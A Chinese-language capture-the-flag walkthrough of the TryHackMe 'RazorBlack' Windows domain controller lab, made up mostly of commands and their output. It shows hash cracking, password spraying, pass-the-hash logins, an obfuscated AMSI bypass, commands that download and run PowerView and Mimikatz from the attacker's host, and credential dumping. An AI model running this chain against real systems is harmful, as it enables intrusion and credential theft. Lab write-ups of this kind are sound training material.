免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务探测

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# nmap -sV -Pn 10.10.246.107          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 01:48 EST
Nmap scan report for 10.10.246.107 
Host is up (0.23s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-02 06:49:52Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 252.05 seconds

枚举

enum4linux,域名应该是RAZ0RBLACK.thm

Domain Name: RAZ0RBLACK
Domain Sid: S-1-5-21-3403444377-2687699443-13012745

枚举分享目录

└─# showmount -e 10.10.246.107 
Export list for 10.10.246.107 :
/users (everyone)

把远程目录mount到本地

mount -t nfs  10.10.246.107 :/users /mnt/share -o nolock

有两个文件

┌──(root💀kali)-[/mnt/share]
└─# ls           
employee_status.xlsx  sbradley.txt

拷贝到本地以后查看文件内容

sbradley.txt内容,Steven's Flag

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# cat sbradley.txt       
��THM{ab53e05c9a98def00314a14ccbfa8104}

employee_status.xlsx内容,爆出了一堆用户名,ljudmila vetrova貌似是DA

HAVEN SECRET HACKER's CLUB                                            
                                            
                                            
                                            
Name's            Role                                
daven port            CTF PLAYER                                
imogen royce            CTF PLAYER                                
tamara vidal            CTF PLAYER                                
arthur edwards            CTF PLAYER                                
carl ingram            CTF PLAYER (INACTIVE)                                
nolan cassidy            CTF PLAYER                                
reza zaydan            CTF PLAYER                                
ljudmila vetrova            CTF PLAYER, DEVELOPER,ACTIVE DIRECTORY ADMIN                                
rico delgado            WEB SPECIALIST                                
tyson williams            REVERSE ENGINEERING                                
steven bradley            STEGO SPECIALIST                                
chamber lin            CTF PLAYER(INACTIVE)                                

尝试制作一个用户字典user.txt

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin

枚举关闭了Kerberos预认证的用户

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile /root/tryhackme/RazorBlack/user.txt   -dc-ip 10.10.246.107 
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:6d5f254f2b01b68443e01ac503a2ed67$bd6fadd530655734b4c85557dea62332df6604adef3cc68742b422b989df3073a8590f6fdf9b1ff84a7f401560d303f3e9a43ebce53c9a5530a9a7180e48e2dcf094b6088013000db177e67cc41ccdf9f94d20480a860cbc943fe0d89e1bc7a237c9754d4987f643f923be5b29f2f2dd2b2f96ef916d2450d2b2a5232c60f693065e299cf93efb6a4d3c23e31d40392e8271289c1765beebebc777aa1befb1acf7fabe45a6d9ecd0b92720c84db10178ca0838414cbcb551cc45b5682732ffb1561d6fed3e3959167ff4793dac3bf9046abff4e0e65621398bdb5df010df1e7e62a282a79f753321983d4910d39537f1
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

出来一个twilliams的tgt

用john破解

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt            
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes    ($krb5asrep$23$twilliams@RAZ0RBLACK.THM)     
1g 0:00:00:06 DONE (2022-03-02 03:49) 0.1623g/s 685381p/s 685381c/s 685381C/s rob3560..roastedfish
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

现在有了一个用户凭证:

twilliams : roastpotatoes

枚举smb

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# smbmap -u "twilliams" -p "roastpotatoes" -H 10.10.246.107 
[+] IP: 10.10.246.107 :445        Name: raz0rblack.thm                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        trash                                                   NO ACCESS       Files Pending for deletion

spray the hash

用同样的密码对上面收集到的用户名做哈希喷洒

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# crackmapexec smb 10.10.246.107 -u user.txt -p pass.txt      
SMB         10.10.246.107    445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.246.107    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE 

看到下面这组用户凭据提示要修改密码

sbradley:roastpotatoes

用smbpasswd.py修改一个新密码

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3 /root/impacket/examples/smbpasswd.py  RAZ0RBLACK.THM/sbradley:roastpotatoes@10.10.246.107 -newpass 'newpassword123'                                                                                                   1 ⨯
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

再次查看smb分享目录,已经对trash有可读权限

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# smbmap -u "sbradley" -p "newpassword123" -H 10.10.246.107 
[+] IP: 10.10.246.107 :445        Name: 10.10.246.107                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        trash                                                   READ ONLY       Files Pending for deletion

查看分享文件

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# smbclient -U 'sbradley%newpassword123' \\\\10.10.246.107 \\trash
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar 16 02:01:28 2021
  ..                                  D        0  Tue Mar 16 02:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 14:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 02:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 14:24:21 2021

chat_log_20210222143423.txt

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....

The administrator died after this incident.

Press F to pay respects

zip文件需要破解,用zip2john转成john可以读取的格式,然后再用john破解

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# /usr/sbin/zip2john experiment_gone_wrong.zip> zip.hash   
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/system.hive PKZIP Encr: TS_chk, cmplen=2941739, decmplen=16281600, crc=BDCCA7E2 ts=591C cs=591c type=8
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/ntds.dit PKZIP Encr: TS_chk, cmplen=15985077, decmplen=58720256, crc=68037E87 ts=5873 cs=5873 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)     
1g 0:00:00:01 DONE (2022-03-02 04:27) 0.5882g/s 4929Kp/s 4929Kc/s 4929KC/s elfo2009..elboty2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

破解zip文件的密码为:electromagnetismo

查看文件

┌──(root💀kali)-[~/tryhackme/RazorBlack/experiment_gone_wrong]  ls                                                                  
ntds.dit  system.hive
Ntds.dit文件是域环境中域控上会有的一个二进制文件,是主要的活动目录数据库,其文件路径为域控的%SystemRoot%\ntds\ntds.dit,活动目录始终会访问这个文件,所以文件禁止被读取

说白了就算AD里的数据库

用secretsdump.py把Ntds.dit里的数据导出,注意这里的数据很多,需要重定向到一个新文件user.hash

python /root/impacket-master/examples/secretsdump.py -ntds ./ntds.dit -system ./system.hive LOCAL > user.hash 

查看这个文件,出现用户的NTML哈希信息

──(root💀kali)-[~/tryhackme/RazorBlack/experiment_gone_wrong]
└─# head user.hash -n 20
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x17a0a12951d502bb3c14cf1d495a71ad
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 84bf0a79cd645db4f94b24c35cfdf7c7
[*] Reading and decrypting hashes from ./ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3:::
<skip>

虽然得到了Administrator的哈希,但是不能通过哈希传递登录
上面的文件需要格式化成一个纯NTML文件,如

1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
...
<skip>

然后再通过下面命令进行哈希喷洒

crackmapexec smb 10.10.246.107  -u /root/tryhackme/RazorBlack/user.txt -H user.hash 

得到一组有效的哈希:

lvetrova:f220d3988deb3f516c73f40ee16c431d

pass the hash

使用evil-winrm登录,拿到foodhold

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# evil-winrm -i 10.10.246.107  -u lvetrova -H f220d3988deb3f516c73f40ee16c431d                                                                                                                                                         1 ⨯

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lvetrova\Documents> whoami
raz0rblack\lvetrova

使用下面两行代码拿到第一个用户flag

*Evil-WinRM* PS C:\Users\lvetrova> $Credential = Import-Clixml -Path "lvetrova.xml"
*Evil-WinRM* PS C:\Users\lvetrova> $Credential.GetNetworkCredential().password
THM{694362e877adef0d85a92e6d17551fe4}

权限提升

绕过powershell执行策略

$env:PSExecutionPolicyPreference="bypass"

绕过 AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

把powerview和SharpHound从远程服务器加载到靶机的内存

iex (iwr http://10.11.63.196/PowerView.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/SharpHound.ps1 -UseBasicParsing)

iex (iwr http://10.11.63.196/Invoke-Mimikatz.ps1  -UseBasicParsing)

从bloodhound可以看出xyan1d3可以远程登录到DC服务器,而且是一个kerberoastablle的用户,属于backup用户组,由此可见是一个有价值的用户

查看用户的SPN

Evil-WinRM* PS C:\Users\lvetrova\Documents> Get-NetUser -spn |select userprincipalname,serviceprincipalname

userprincipalname      serviceprincipalname
-----------------      --------------------
                       kadmin/changepw
xyan1d3@raz0rblack.thm HAVEN-DC/xyan1d3.raz0rblack.thm:60111

存在一个xyan1d3的SPN,用GetUserSPNs.py导出

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# python3  /root/impacket/examples/GetUserSPNs.py raz0rblack.thm/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile hash.txt
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                   Name     MemberOf                                                    PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -------  ----------------------------------------------------------  --------------------------  ---------  ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111  xyan1d3  CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm  2021-02-23 10:17:17.715160  <never>  

使用john破解

┌──(root💀kali)-[~/tryhackme/RazorBlack]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cyanide9amine5628 (?)
1g 0:00:00:05 DONE (2022-03-02 09:41) 0.1748g/s 1550Kp/s 1550Kc/s 1550KC/s cybermilk0..cy2802341
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到xyan1d3的明文密码:cyanide9amine5628

登录:

evil-winrm -i 10.10.246.107  -u xyan1d3 -p cyanide9amine5628

使用下面两行代码拿到第二个用户flag

*Evil-WinRM* PS C:\Users\xyan1d3> $Credential = Import-Clixml -Path "xyan1d3.xml"
*Evil-WinRM* PS C:\Users\xyan1d3> $Credential.GetNetworkCredential().password
LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}

查看当前用户权限

*Evil-WinRM* PS C:\Users\xyan1d3> whoami /all

USER INFORMATION
----------------

User Name          SID
================== ============================================
raz0rblack\xyan1d3 S-1-5-21-3403444377-2687699443-13012745-1106


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

拥有SeBackupPrivilegeSeRestorePrivilege两种提权能力

在hacktricks里是这样描述这个SeBackupPrivilege能力的

This privilege causes the system to grant all read access control to any file (only read).
Use it to read the password hashes of local Administrator accounts from the registry and then use "psexec" or "wmicexec" with the hash (PTH).
This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.

可以利用这个能力读取任何文件包括哈希文件,我们可以用于读取Administrator的哈希

关于SeRestorePrivilege

Write access control to any file on the system, regardless of the files ACL.
You can modify services, DLL Hijacking, set debugger (Image File Execution Options)… A lot of options to escalate.

可以在任何路径写入dll文件进行dll劫持

因为dll劫持还需要有重启系统服务的能力,我们重点关注SeBackupPrivilege的利用

我搜索了一下利用方法,找到了这篇文章

导出sam和system文件到本地

reg save HKLM\SAM sambkup.hiv

reg save HKLM\SYSTEM systembkup.hiv

使用mimikatz导出NTML哈希(注意每次登陆都要bypass powershell policy 和AMSI)

Evil-WinRM* PS C:\Users\xyan1d3\Documents> Invoke-Mimikatz -Command '"lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv
Domain : HAVEN-DC
SysKey : f1582a79dd00631b701d3d15e75e59f6
Local SID : S-1-5-21-1320649623-3804182013-2902712059

SAMKey : eaa05099b2f12f633fca797270e3e4fa

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 9689931bed40ca5a2ce1218210177f0c

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

使用哈希传递登录administrator的账号

──(root💀kali)-[~/tryhackme/RazorBlack]
└─# evil-winrm -i 10.10.246.107  -u Administrator -H 9689931bed40ca5a2ce1218210177f0c

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator

已拿到系统管理员权限

读取root.xml

*Evil-WinRM* PS C:\Users\Administrator> cat root.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Administrator</S>
      <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>
  </Obj>
</Objs>

在hackbar上用hexdecode为

Damn you are a genius.
But, I apologize for cheating you like this.

Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.

另一个cookie.json的内容

*Evil-WinRM* PS C:\Users\Administrator> cat cookie.json
{
        auth : "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU="
}

base64decode后:

Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.

And stop putting 'OR '1'='1 inside login.php

Enjoy your Cookie

去到另一个用户文件夹

*Evil-WinRM* PS C:\Users\twilliams> ls


    Directory: C:\Users\twilliams


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        2/25/2021  10:18 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        2/25/2021  10:20 AM             80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_de
                                                 finitely_definitely_not_a_flag.exe

有一个名字超长的exe文件,尝试执行,但是失败了

直接读取

*Evil-WinRM* PS C:\Users\twilliams> cat definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe
THM{5144f2c4107b7cab04916724e3749fb0}
What is the complete top secret?

把这张图片下载到本地
C:\Program Files\Top Secret\top_secret.png

答案是::wq


天线锅仔
4 声望2 粉丝